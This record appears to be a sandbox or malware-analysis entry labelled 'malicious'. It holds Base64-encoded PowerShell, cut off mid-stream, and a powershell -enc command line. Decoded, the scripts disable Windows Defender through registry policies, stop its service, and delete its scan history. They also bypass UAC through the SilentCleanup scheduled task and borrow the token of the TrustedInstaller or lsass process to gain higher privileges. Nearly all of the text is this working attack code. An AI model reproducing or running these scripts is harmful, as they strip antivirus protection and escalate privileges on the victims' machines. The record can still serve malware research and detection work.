ZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAX